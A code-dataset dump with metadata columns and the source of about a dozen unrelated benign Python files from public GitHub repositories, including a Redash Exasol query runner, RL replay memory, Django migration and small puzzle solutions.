blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f742b40048d600de11e340648eb9e41f0de18b24 | adde5784379cba18934bc32bd779959ccc8bc94f | /redash/query_runner/exasol.py | 790fb7d7475c18e969c6cb22d50a6751c0be4eae | [
"BSD-2-Clause"
] | permissive | YuanlvCold/mxzz-bi | 32292a8cafb4097fcb60e70917849a2f23e5511f | 7cae1b80e2f715d0af7ca912d1793668353c4b9e | refs/heads/master | 2022-12-02T04:39:06.631341 | 2020-08-17T06:46:19 | 2020-08-17T06:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,668 | py | import datetime
from redash.query_runner import *
from redash.utils import json_dumps
def _exasol_type_mapper(val, data_type):
if val is None:
return None
elif data_type["type"] == "DECIMAL":
if data_type["scale"] == 0 and data_type["precision"] < 16:
return int(val)
elif data_type["scale"] == 0 and data_type["precision"] >= 16:
return val
else:
return float(val)
elif data_type["type"] == "DATE":
return datetime.date(int(val[0:4]), int(val[5:7]), int(val[8:10]))
elif data_type["type"] == "TIMESTAMP":
return datetime.datetime(
int(val[0:4]),
int(val[5:7]),
int(val[8:10]), # year, month, day
int(val[11:13]),
int(val[14:16]),
int(val[17:19]), # hour, minute, second
int(val[20:26].ljust(6, "0")) if len(val) > 20 else 0,
) # microseconds (if available)
else:
return val
def _type_mapper(data_type):
if data_type["type"] == "DECIMAL":
if data_type["scale"] == 0 and data_type["precision"] < 16:
return TYPE_INTEGER
elif data_type["scale"] == 0 and data_type["precision"] >= 16:
return TYPE_STRING
else:
return TYPE_FLOAT
elif data_type["type"] == "DATE":
return TYPE_DATE
elif data_type["type"] == "TIMESTAMP":
return TYPE_DATETIME
else:
return TYPE_STRING
try:
import pyexasol
enabled = True
except ImportError:
enabled = False
class Exasol(BaseQueryRunner):
noop_query = "SELECT 1 FROM DUAL"
@classmethod
def configuration_schema(cls):
return {
"type": "object",
"properties": {
"user": {"type": "string"},
"password": {"type": "string"},
"host": {"type": "string"},
"port": {"type": "number", "default": 8563},
"encrypted": {"type": "boolean", "title": "Enable SSL Encryption"},
},
"required": ["host", "port", "user", "password"],
"order": ["host", "port", "user", "password", "encrypted"],
"secret": ["password"],
}
def _get_connection(self):
exahost = "%s:%s" % (
self.configuration.get("host", None),
self.configuration.get("port", 8563),
)
return pyexasol.connect(
dsn=exahost,
user=self.configuration.get("user", None),
password=self.configuration.get("password", None),
encryption=self.configuration.get("encrypted", True),
compression=True,
json_lib="rapidjson",
fetch_mapper=_exasol_type_mapper,
)
def run_query(self, query, user):
connection = self._get_connection()
statement = None
error = None
try:
statement = connection.execute(query)
columns = [
{"name": n, "friendly_name": n, "type": _type_mapper(t)}
for (n, t) in statement.columns().items()
]
cnames = statement.column_names()
rows = [dict(zip(cnames, row)) for row in statement]
data = {"columns": columns, "rows": rows}
json_data = json_dumps(data)
finally:
if statement is not None:
statement.close()
connection.close()
return json_data, error
def get_schema(self, get_stats=False):
query = """
SELECT
COLUMN_SCHEMA,
COLUMN_TABLE,
COLUMN_NAME
FROM EXA_ALL_COLUMNS
"""
connection = self._get_connection()
statement = None
try:
statement = connection.execute(query)
result = {}
for (schema, table_name, column) in statement:
table_name_with_schema = "%s.%s" % (schema, table_name)
if table_name_with_schema not in result:
result[table_name_with_schema] = {
"name": table_name_with_schema,
"columns": [],
}
result[table_name_with_schema]["columns"].append(column)
finally:
if statement is not None:
statement.close()
connection.close()
return result.values()
@classmethod
def enabled(cls):
return enabled
register(Exasol)
| [
"2426548297@qq.com"
] | 2426548297@qq.com |
9f9ad3e97589ce06abe60f4f50a7a25348e188fb | 0f0a0d5672bf40438d68ad523f484da0760407e8 | /Intro to Tensorflow/regression.py | 09dcf16265433ca238162899742a45f9e63ad631 | [
"MIT"
] | permissive | ITSJKS/100-Days-of-ML-Code | 45b3c4873df7e8684308003b8cc860a08000e11b | 677d8d6a19ae63d3aa2ddd74e9ce8ae7a06b71df | refs/heads/master | 2023-04-14T06:22:04.196837 | 2019-01-21T07:58:59 | 2019-01-21T07:58:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 22 19:01:05 2018
Tensorflow implementation of the iris dataset classification
@author: Vishal
"""
#Using a linear classifier
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics
iris = datasets.load_iris()
clf = tf.TensorFlowLinearClassifier(n_classes=3)
clf.fit(iris.data, iris.target)
acc = metrics.accuracy_score(iris.target, clf.predict(iris.data))
print(f'{acc}')
#Using a linear regressor
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics, preprocessing, cross_validation
iris = datasets.load_iris()
scaler = preprocessing.MinMaxScaler()
features = scaler.fit_transform(iris.data)
labels = iris.target
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features, labels, test_size=0.3, random_state=42)
clf = tf.TensorFlowLinearRegressor()
clf.fit(features_train, labels_train)
accuracy = metrics.accuracy_score(labels_test, clf.predict(features_test))
print(f'{acc}') | [
"vishal114186@gmail.com"
] | vishal114186@gmail.com |
218de8abbc9bfd77742d7ab9ac813686655e4ae3 | 46d2a73deb63f81554c478822459a41f09d8519c | /github/objects/projectcard.py | 4b94450c49a4edf517c719c3e31c973f8a74e7dd | [
"Apache-2.0"
] | permissive | ByteMeDirk/github.py | ad036aef661adc4d9a06239f52b79acd5230c430 | 14b14f857fb85c35b5d14ba073afc36e339199b9 | refs/heads/master | 2023-08-10T17:40:52.783117 | 2020-08-13T23:54:55 | 2020-08-13T23:54:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,230 | py | """
/github/objects/projectcard.py
Copyright (c) 2019-2020 ShineyDev
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from github import utils
from github.abc import Node
from github.abc import Type
from github.abc import UniformResourceLocatable
from github.enums import ProjectCardState
class ProjectCard(Node, Type, UniformResourceLocatable):
"""
Represents a card in a GitHub project.
Implements:
* :class:`~github.abc.Node`
* :class:`~github.abc.Type`
* :class:`~github.abc.UniformResourceLocatable`
"""
# https://docs.github.com/en/graphql/reference/objects#projectcard
__slots__ = ("data", "http")
def __init__(self, data, http):
self.data = data
self.http = http
@property
def body(self):
"""
The body of the card.
:type: Optional[:class:`str`]
"""
return self.data["note"]
@property
def created_at(self):
"""
When the card was created.
:type: :class:`~datetime.datetime`
"""
created_at = self.data["createdAt"]
return utils.iso_to_datetime(created_at)
@property
def database_id(self):
"""
The card's database ID.
:type: :class:`int`
"""
return self.data["databaseId"]
@property
def is_archived(self):
"""
Whether the card is archived.
:type: :class:`bool`
"""
return self.data["isArchived"]
@property
def state(self):
"""
The card's state.
:type: :class:`~github.enums.ProjectCardState`
"""
state = self.data["state"]
return ProjectCardState.try_value(state)
@property
def updated_at(self):
"""
When the card was last updated.
:type: :class:`~datetime.datetime`
"""
updated_at = self.data["updatedAt"]
return utils.iso_to_datetime(updated_at)
async def move_to(self, column, *, after=None):
"""
|coro|
Moves the card to a column.
Parameters
----------
column: :class:`~github.ProjectColumn`
The column to move the card to.
after: :class:`~github.ProjectCard`
The card to place the card after. Pass ``None`` to place it
at the top. Defaults to ``None``.
Raises
------
~github.errors.Forbidden
You do not have permission to move the card.
"""
# https://docs.github.com/en/graphql/reference/mutations#moveprojectcard
if after is not None:
after = after.id
await self.http.mutate_projectcard_move_to(self.id, column.id, after)
| [
"contact@shiney.dev"
] | contact@shiney.dev |
43876ba54601bc0d0ee260b3f6b6a8ad88551d0d | 730430ba3b45d5728ef044863598199bfa33aaaa | /examples/Baselines/Halite_competition/torch/rl_trainer/replay_memory.py | b4c790801b49cecbdfda042bfbf8dbcc81e1227a | [
"Apache-2.0"
] | permissive | PaddlePaddle/PARL | 062d1b4a5335553be6cdfc33ad12f07ebbcd7310 | 3bb5fe36d245f4d69bae0710dc1dc9d1a172f64d | refs/heads/develop | 2023-08-09T02:12:39.741551 | 2023-05-19T17:52:25 | 2023-05-19T17:52:25 | 131,044,128 | 3,818 | 988 | Apache-2.0 | 2023-07-28T03:59:20 | 2018-04-25T17:54:22 | Python | UTF-8 | Python | false | false | 3,684 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
class ReplayMemory(object):
""" Replay Memory for saving data.
Args:
max_size (int): size of replay memory
obs_dim (int): dimension of the observation
"""
def __init__(self, max_size, obs_dim):
self.max_size = int(max_size)
self.obs_dim = obs_dim
self.reset()
def sample_batch(self, batch_size):
if batch_size > self._curr_size:
batch_idx = np.arange(self._curr_size)
else:
batch_idx = np.random.randint(self._curr_size, size=batch_size)
obs = self.obs[batch_idx]
action = self.action[batch_idx]
value = self.value[batch_idx]
returns = self.returns[batch_idx].reshape((-1, 1))
log_prob = self.log_prob[batch_idx]
adv = self.adv[batch_idx]
return obs, action, value, returns, log_prob, adv
def make_index(self, batch_size):
batch_idx = np.random.randint(self._curr_size, size=batch_size)
return batch_idx
def sample_batch_by_index(self, batch_idx):
obs = self.obs[batch_idx]
action = self.action[batch_idx]
value = self.value[batch_idx]
returns = self.returns[batch_idx]
log_prob = self.log_prob[batch_idx]
adv = self.adv[batch_idx]
return obs, action, value, returns, log_prob, adv
def append(self, obs, act, value, returns, log_prob, adv):
size = len(obs)
self._curr_size = min(self._curr_size + size, self.max_size)
if self._curr_pos + size >= self.max_size:
delta_size = -(size + self._curr_pos - self.max_size)
self.obs = np.roll(self.obs, delta_size, 0)
self.action = np.roll(self.action, delta_size)
self.value = np.roll(self.value, delta_size)
self.returns = np.roll(self.returns, delta_size)
self.log_prob = np.roll(self.log_prob, delta_size)
self.adv = np.roll(self.adv, delta_size)
self._curr_pos += delta_size
self.obs[self._curr_pos:self._curr_pos + size] = obs
self.action[self._curr_pos:self._curr_pos + size] = act
self.value[self._curr_pos:self._curr_pos + size] = value
self.returns[self._curr_pos:self._curr_pos + size] = returns
self.log_prob[self._curr_pos:self._curr_pos + size] = log_prob
self.adv[self._curr_pos:self._curr_pos + size] = adv
self._curr_pos = (self._curr_pos + size) % self.max_size
def size(self):
return self._curr_size
def __len__(self):
return self._curr_size
def reset(self):
self.obs = np.zeros((self.max_size, self.obs_dim), dtype='float32')
self.action = np.zeros((self.max_size, ), dtype='int32')
self.value = np.zeros((self.max_size, ), dtype='float32')
self.returns = np.zeros((self.max_size, ), dtype='float32')
self.log_prob = np.zeros((self.max_size, ), dtype='float32')
self.adv = np.zeros((self.max_size, ), dtype='float32')
self._curr_size = 0
self._curr_pos = 0
| [
"noreply@github.com"
] | PaddlePaddle.noreply@github.com |
9825285fd8b02cec04445d56367f20d53ae3c2d7 | 85ac9f05432a2a4299cb43969395fd7865e78267 | /entrega4/src/pruebas/process_redirections_to_turtle.py | 7e480559ab44f750fdf039792dc86192344abdfd | [] | no_license | pablodanielrey/twss | 72d8056c2f3fd2a70d465d3176802dbc019fd022 | b533fa6e0ea86460d8ccb49ec554a6f6e7ab4352 | refs/heads/master | 2023-05-20T03:06:23.078921 | 2021-06-12T23:31:13 | 2021-06-12T23:31:13 | 352,428,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | import sys
import json
import requests
import re
def get_content(req):
if (req.status_code >= 300 and req.status_code < 400):
''' es una redirección '''
url = req.headers['Location']
assert url != None
req = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
return get_content(req)
if req.status_code == 200:
return req.text
return None
"""
esto por lo que veo no es necesario
if content and req.status_code != 200:
''' analizo el contenido alternativo '''
alternates = r.headers.get('Alternates',None)
if not alternates:
print(f'No existe representación text/turtle para la url {url}')
return None
url = process_alternates(alternates)
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
return url
"""
def process_alternates(alternates):
reg = re.compile('{\"(.*)\".*?{type (.*?)}}')
alts = alternates.split(',')
for a in alts:
m = reg.match(a.strip())
if m:
url = m.group(1)
content = m.group(2)
if 'turtle' in content:
return url
return None
if __name__ == '__main__':
url = sys.argv[1]
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=True)
print(get_content(r))
| [
"pablodanielrey@gmail.com"
] | pablodanielrey@gmail.com |
009bd21a3d2025431d689ed24c60ffaf15d6dd35 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_threesomes.py | 7e62196108961159ab33296a6027c68b9f050abc | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _THREESOMES():
def __init__(self,):
self.name = "THREESOMES"
self.definitions = threesome
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['threesome']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
bf2f71d4544d180707bbd68d82738833911d9391 | a41742023c5725a3e5cfbf50a54601dbe0416855 | /evafm/database/models.py | 41fcb478214df0029c4445d44854f7a1e9d9ee17 | [] | no_license | UfSoft/EvAFM | 1cccb6651833565ccc2e3d241a2e70040e999291 | 72dca1c40ca6ae90d4228ac0e208c623ed6c5d3b | refs/heads/master | 2020-04-15T04:42:43.690612 | 2011-01-21T23:15:51 | 2011-01-21T23:15:51 | 26,618,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | # -*- coding: utf-8 -*-
"""
evafm.core.database.models
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: © 2011 UfSoft.org - Pedro Algarvio (pedro@algarvio.me)
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import logging
from os import path
from operator import itemgetter
from datetime import datetime
from types import ModuleType
from uuid import uuid4
import sqlalchemy
from sqlalchemy import and_, or_
from sqlalchemy import orm
from sqlalchemy.orm.exc import UnmappedClassError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.engine.url import make_url, URL
from werkzeug.security import generate_password_hash, check_password_hash
from evafm.database.signals import database_setup
log = logging.getLogger(__name__)
#: create a new module for all the database related functions and objects
sys.modules['evafm.database.db'] = db = ModuleType('db')
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
class _DebugQueryTuple(tuple):
statement = property(itemgetter(0))
parameters = property(itemgetter(1))
start_time = property(itemgetter(2))
end_time = property(itemgetter(3))
context = property(itemgetter(4))
@property
def duration(self):
return self.end_time - self.start_time
def __repr__(self):
return '<query statement="%s" parameters=%r duration=%.03f>' % (
self.statement,
self.parameters,
self.duration
)
class _ModelTableNameDescriptor(object):
_camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
def _join(match):
word = match.group()
if len(word) > 1:
return ('_%s_%s' % (word[:-1], word[-1])).lower()
return '_' + word.lower()
tablename = self._camelcase_re.sub(_join, type.__name__).lstrip('_')
setattr(type, '__tablename__', tablename)
return tablename
class Model(object):
"""Baseclass for custom user models."""
#: the query class used. The :attr:`query` attribute is an instance
#: of this class. By default a :class:`BaseQuery` is used.
query_class = orm.Query
#: an instance of :attr:`query_class`. Can be used to query the
#: database for instances of this model.
query = None
# #: arguments for the mapper
# __mapper_cls__ = _SignalTrackingMapper
__tablename__ = _ModelTableNameDescriptor()
#def get_engine():
# return
#
#def _create_scoped_session(db):
# return orm.scoped_session(partial(_SignallingSession, db))
#
class _QueryProperty(object):
def __init__(self):
database_setup.connect(self.__on_database_setup)
def __on_database_setup(self, sender):
self.db = sender
def __get__(self, obj, type):
try:
mapper = orm.class_mapper(type)
if mapper:
return type.query_class(mapper, session=self.db.get_session())
except UnmappedClassError:
return None
db.and_ = and_
db.or_ = or_
#del and_, or_
Model = declarative_base(cls=Model, name='Model')
Model.query = _QueryProperty()
metadata = Model.metadata
db.metadata = metadata
class SchemaVersion(Model):
"""SQLAlchemy-Migrate schema version control table."""
__tablename__ = 'migrate_version'
repository_id = db.Column(db.String(255), primary_key=True)
repository_path = db.Column(db.Text)
version = db.Column(db.Integer)
def __init__(self, repository_id, repository_path, version):
self.repository_id = repository_id
self.repository_path = repository_path
self.version = version
| [
"ufs@ufsoft.org"
] | ufs@ufsoft.org |
e6099d9bca20c1e703ed995f7d4e83cb35feb56d | 13d222bc3332378d433835914da26ed16b583c8b | /src/pemjh/challenge111/main.py | 55ded9f15d33ecae72908afa7c8d34a24369a64e | [] | no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | """ Challenge111 """
# pylint: disable=missing-docstring
from pemjh.numbers import is_prime
def build_nums(repeated, other):
if len(repeated) > 0:
if len(repeated) > 1 or len(other) > 0:
for num in build_nums(repeated[1:], other):
yield [repeated[0]] + num
else:
yield [repeated[0]]
if len(other) > 0:
if len(repeated) > 0 or len(other) > 1:
for num in build_nums(repeated, other[1:]):
yield [other[0]] + num
else:
yield [other[0]]
def main():
""" challenge111 """
# pylint: disable=invalid-name
M = [8, 9, 8, 9, 9, 9, 9, 9, 8, 9]
S = []
for i in range(10):
s = 0
# use M[i] to build up all possible numbers
for m in [list(("%0" + str(10 - M[i]) + "d") % m)
for m in range(0, 10**(10 - M[i]))]:
if not any(int(c) == i for c in m):
for num in [int("".join(b))
for b in build_nums([str(i)] * M[i], m)]:
if num >= 10**(9) and is_prime(num):
# Check each for primality
s += num
S.append(s)
return sum(S)
| [
"matthew.hussey@googlemail.com"
] | matthew.hussey@googlemail.com |
deaf64a7afcb6d1a9c81b881eef0fa76f4e156d2 | 1f4239936f18b709e82a965022d5d549238bb620 | /klein/test/util.py | 9755e2b9e215d85c5b5aa3c33130e6e879e8b915 | [
"MIT"
] | permissive | WnP/klein | 2165625dcbacb77bc2789dad6c4379685d634d0b | a07a6742abbd2418f2b42bf951ab11de23885c0f | refs/heads/master | 2020-12-25T21:12:27.192758 | 2014-05-14T22:27:06 | 2014-05-14T22:27:06 | 19,759,744 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,926 | py | import twisted
from twisted.trial.unittest import TestCase
from twisted.python import failure
from twisted.python.versions import Version
if twisted.version < Version('twisted', 13, 1, 0):
class TestCase(TestCase):
def successResultOf(self, deferred):
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Success result expected on %r, found no result instead" % (
deferred,))
elif isinstance(result[0], failure.Failure):
self.fail(
"Success result expected on %r, "
"found failure result instead:\n%s" % (
deferred, result[0].getTraceback()))
else:
return result[0]
def failureResultOf(self, deferred, *expectedExceptionTypes):
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Failure result expected on %r, found no result instead" % (
deferred,))
elif not isinstance(result[0], failure.Failure):
self.fail(
"Failure result expected on %r, "
"found success result (%r) instead" % (deferred, result[0]))
elif (expectedExceptionTypes and
not result[0].check(*expectedExceptionTypes)):
expectedString = " or ".join([
'.'.join((t.__module__, t.__name__)) for t in
expectedExceptionTypes])
self.fail(
"Failure of type (%s) expected on %r, "
"found type %r instead: %s" % (
expectedString, deferred, result[0].type,
result[0].getTraceback()))
else:
return result[0]
| [
"haggardii@gmail.com"
] | haggardii@gmail.com |
b62869b2ea9ec7ee576a4f420b28e4a11c073e56 | 82319ec6aaf462f6823f43946a7f4a0624bffa20 | /Mariana/candies.py | 0cf5f3dbec3776bc67771d2ceb5bca91f91c772a | [
"Apache-2.0"
] | permissive | enterstudio/Mariana | b76a382f5873f9bf83837e9f5190ab6684e14972 | 6b186d93c5fe5521603a389e975595e45e1ea5d2 | refs/heads/master | 2021-04-29T04:30:21.627507 | 2017-11-21T16:30:55 | 2017-11-21T16:30:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,294 | py | import sys, time
import Mariana.settings as MSET
MESSAGE_LOG_FILE = None
def friendly(msgSubject, msg, warning=False, flush = True) :
"""Prints a friendly message"""
global MESSAGE_LOG_FILE
m = " " + msg.replace("\n", '\n ')
if warning :
subject = "WARNING: " + msgSubject
else :
subject = msgSubject
s = """\n%s:\n%s\n%s\n\n Cheers :),\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m)
if MSET.VERBOSE :
print s
if flush :
sys.stdout.flush()
if MSET.SAVE_MESSAGE_LOG :
if not MESSAGE_LOG_FILE :
MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
if flush :
MESSAGE_LOG_FILE.flush()
def fatal(msgSubject, msg, toRaise = ValueError, flush = True) :
"""Death is upon us"""
global MESSAGE_LOG_FILE
m = " " + msg.replace("\n", '\n ')
subject = msgSubject
s = """\n%s:\n%s\n%s\n\n %s\nSorry,\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m, toRaise.message)
if MSET.SAVE_MESSAGE_LOG :
if not MESSAGE_LOG_FILE :
MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
if flush :
MESSAGE_LOG_FILE.flush()
raise toRaise | [
"tariq.daouda@umontreal.ca"
] | tariq.daouda@umontreal.ca |
3d176dce7202f238b832138d2285f99c932b6cae | 3d7860f969ee69585b476fb22ff2ee1cff587eab | /src/inventory/migrations/0003_auto_20180123_1811.py | 56cdec16960d437cfa3a33d52bc9d1ce1df42bb9 | [] | no_license | niketanmoon/inventory1 | c8778c89eb641dd35d75589c3ffb8d8c200eec34 | 7cb204c5ee5519c89bced51e55675f9d0f3475b0 | refs/heads/master | 2022-10-19T01:31:37.915746 | 2018-01-24T09:32:25 | 2018-01-24T09:32:25 | 118,739,027 | 0 | 1 | null | 2022-10-11T05:56:48 | 2018-01-24T08:56:48 | Python | UTF-8 | Python | false | false | 707 | py | # Generated by Django 2.0.1 on 2018-01-23 12:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inventory', '0002_auto_20180117_1255'),
]
operations = [
migrations.AlterField(
model_name='computer',
name='Acquisitiondate',
field=models.DateField(null=True),
),
migrations.AlterField(
model_name='computer',
name='Purchasedate',
field=models.DateField(null=True),
),
migrations.AlterField(
model_name='computer',
name='Returndate',
field=models.DateField(null=True),
),
]
| [
"niketanmoon@gmail.com"
] | niketanmoon@gmail.com |
4a598d2367df91c2132f36ba1260a08e69c2849f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/405.py | aeb8d5ee9d8ab943436dd2561792b7b36aab3233 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | for j in range(int(raw_input())):
I = int(raw_input())
A = list(map(int, raw_input().split(" ")))
result = max(A)
Z = 2
while Z < result:
result = min(result, sum([(x - 1) // Z for x in A]) + Z)
Z += 1
print 'Case #%d: %s' % (j + 1, result) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
2066d3c55c24d18937568e13c5eed223311a3637 | 7876cdf2db81f57998578823f677536e85691075 | /jsongraph/binding.py | e269afb396a71490c93d62c230d23fdd84b24a4d | [
"MIT"
] | permissive | backgroundcheck/jsongraph | fe43b2d1bd3c762639614e513cd727bc93a89a0c | 35e4f397dbe69cd5553cf9cb9ab98859c3620f03 | refs/heads/master | 2021-01-17T11:43:40.447531 | 2015-10-02T13:20:53 | 2015-10-02T13:20:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from rdflib import Literal, URIRef
# from rdflib.term import Identifier
# from rdflib.namespace import RDF
from jsonmapping import SchemaVisitor
from jsongraph.util import is_url, safe_uriref
from jsongraph.vocab import BNode, PRED, ID
class Binding(SchemaVisitor):
@property
def uri(self):
val = self.path
return None if val is None else URIRef(val)
@property
def subject(self):
if not hasattr(self, '_rdf_subject'):
self._rdf_subject = None
subject = self.schema.get('rdfSubject', 'id')
for prop in self.properties:
if prop.match(subject):
obj = prop.object
if obj is not None and not isinstance(obj, URIRef):
obj = ID[obj]
self._rdf_subject = obj
break
if self._rdf_subject is None:
self._rdf_subject = BNode()
return self._rdf_subject
@property
def predicate(self):
return PRED[self.schema.get('rdfName', self.name)]
@property
def reverse(self):
name = self.schema.get('rdfReverse')
if name is not None:
return PRED[name]
if self.parent is not None and self.parent.is_array:
return self.parent.reverse
def get_property(self, predicate):
for prop in self.properties:
if predicate == PRED[prop.name]:
return prop
@property
def object(self):
if self.data is None:
return self.data
if self.schema.get('format') == 'uri' or \
self.schema.get('rdfType') == 'uri':
try:
return safe_uriref(self.data)
except:
pass
if self.schema.get('rdfType') == 'id':
if is_url(self.data):
try:
return safe_uriref(self.data)
except:
pass
return ID[self.data]
return Literal(self.data)
| [
"friedrich@pudo.org"
] | friedrich@pudo.org |
5bb04a05fca219f33e78261c8eabe59102d646b5 | fb82fdf706863465b1f357cd1fa0447474cd8a70 | /ServerComponent/venv/Lib/site-packages/rsrc/framework/view.py | 33c4500d6b89d88f27d05dc9d26bfb47d98bb8b9 | [
"MIT"
] | permissive | CDU55/FakeNews | d79e2a069b3f1392f779d5b2256cd54c696e789a | 707bd48dd78851081d98ad21bbdadfc2720bd644 | refs/heads/main | 2023-02-20T06:27:18.618837 | 2021-01-17T15:14:27 | 2021-01-17T15:14:27 | 305,167,221 | 0 | 1 | MIT | 2020-12-07T19:51:46 | 2020-10-18T18:16:49 | Python | UTF-8 | Python | false | false | 2,331 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
import functools
from rsrc import Request
def response(method):
@functools.wraps(method)
def decorator(self, *args, **kwargs):
resp = method(self, *args, **kwargs)
data = json.dumps(resp.data)
resp.headers.update({'Content-Type': 'application/json'})
return self.make_response(data, resp.status, resp.headers)
return decorator
class ProxyView(object):
"""Delegate requests from framework-view to resource-view.
Subclasses of `ProxyView` should set the `view` attribute, and override
the following methods:
get_uri
get_query_params
get_auth_params
get_data
make_response
"""
def get_uri(self, request):
raise NotImplementedError()
def get_query_params(self, request):
raise NotImplementedError()
def get_auth_params(self, request):
raise NotImplementedError()
def get_data(self, request):
raise NotImplementedError()
def make_response(self, data, status, headers):
raise NotImplementedError()
def make_request(self, raw_request):
request = Request(
scheme=raw_request.scheme,
uri=self.get_uri(raw_request),
method=raw_request.method,
data=self.get_data(raw_request),
query_params=self.get_query_params(raw_request),
kwargs=dict(auth=self.get_auth_params(raw_request))
)
return request
@response
def options(self, request, **kwargs):
return self.view.options_proxy(self.make_request(request), **kwargs)
@response
def get(self, request, **kwargs):
return self.view.get_proxy(self.make_request(request), **kwargs)
@response
def post(self, request, **kwargs):
return self.view.post_proxy(self.make_request(request, **kwargs))
@response
def put(self, request, **kwargs):
return self.view.put_proxy(self.make_request(request), **kwargs)
@response
def patch(self, request, **kwargs):
return self.view.patch_proxy(self.make_request(request), **kwargs)
@response
def delete(self, request, **kwargs):
return self.view.delete_proxy(self.make_request(request), **kwargs)
| [
"48147775+BiancaChirica@users.noreply.github.com"
] | 48147775+BiancaChirica@users.noreply.github.com |
